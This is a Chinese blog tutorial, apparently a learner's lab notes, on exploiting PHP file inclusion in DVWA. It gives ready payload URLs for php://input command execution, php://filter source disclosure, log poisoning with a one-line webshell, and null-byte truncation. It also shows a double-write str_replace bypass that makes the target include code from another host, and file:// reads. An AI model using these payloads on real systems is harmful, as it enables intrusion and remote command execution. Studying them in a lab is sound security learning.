美文网首页
包含漏洞

包含漏洞

作者: 卿酌南烛_b805 | 来源:发表于2020-04-12 18:37 被阅读0次

文件包含脑图


本地包含

使用include文件

代码表示上传的文件都以php执行

远程包含

需要把allow_url_include=off这行,把off改成on

包含日志文件

开启apache日志方法打开配置文件-httpd-conf”,打开httpd.conf配置文件,第299行

1.    ##CustomLog "logs/access.log" common

去掉前边的 # ,并重启apache

写入一句话木马

PHP包含写文件

构造URL:

http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input,并且提交post数据为:<?php

system('net user');?>

PHP包含读文件

http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php

访问URL,得到经过base64加密后的字符串:


包含截断绕过

<?php

         if(isset($_GET['page'])){

                  include$_GET['page'] .".php" ;

         }else{

                  include'home.php';

         }

?>

   这种方法只适合于magic_quotes_gpc=off的时候, php版本小于5.3.4,可通过%00截断绕过,不过现在已经很难见到了(空字节),比如:index.php?file=info.txt//////////////…………超过一定数据的/。

str_replace、fnmatch涵数绕过

str_replace函数绕过:

使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。

例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103/phpinfo.txt,成功执行远程命令。

同时,因为替换的只是“../”、“..\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。

1、本地文件包含

 http://192.168.0.113:82/dvwa/vulnerabilities/fi/?page=..././777.jpg

2、绝对路径不受任何影响http://192.168.0.113:82/dvwa/vulnerabilities/fi/?page=c:/2.txt

3、远程文件包含:http://192.168.0.113:82/dvwa/vulnerabilities/fi/?page=htthttp://p://192.168.0.106:8080/index.php

fnmatch函数绕过

if(!fnmatch("file*",$file)&&$file!="include.php"),当文件既不是"include.php"也不是"file*"(文件名file开头)时才抛出错误,反之意思,如果文件名符合其中一个条件既可以。page=file:///C:/xampp/htdocs/dvwa/php.ini 刚好满足"file*"(文件名file开头)。

 http://192.168.0.113:82/dvwa/vulnerabilities/fi/?page=file:///C:/2.txt

有时间的同学可以完成一下https://m.hundan.org/wooyun-2014-061639


相关文章

  • 包含漏洞

    文件包含脑图 本地包含 使用include文件 代码表示上传的文件都以php执行 远程包含 需要把allow_ur...

  • php安全

    文件包含漏洞** 本地文件包含**能打开并包含本地文件的漏洞,被称为本地文件包含漏洞(LFI)%00截断,php内...

  • 文件包含漏洞

    定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄...

  • 文件包含漏洞

    几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP...

  • 文件包含漏洞

    文件转载自https://blog.csdn.net/chence19871/article/details/51...

  • 文件包含漏洞

    文件包含漏洞 产生的原因:通过引入文件时,用户可控,没有严格的检验,或是被绕过,操作一些敏感文件,导致文件泄露和恶...

  • 文件包含漏洞

    文件包含 常见文件包含函数 利用条件 程序用include()等文件包含函数通过动态变量的范式引入需要包含的文件 ...

  • 文件包含漏洞

    当allow_url_open=on allow_url_include=on 就会造成文件包含漏洞 http:/...

  • 文件包含漏洞

    一、文件包含漏洞简介 1、包含:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文...

  • 文件包含漏洞

    文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用"包含"函数功能,比如...

网友评论

      本文标题:包含漏洞

      本文链接:https://www.haomeiwen.com/subject/obybmhtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|包含漏洞|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!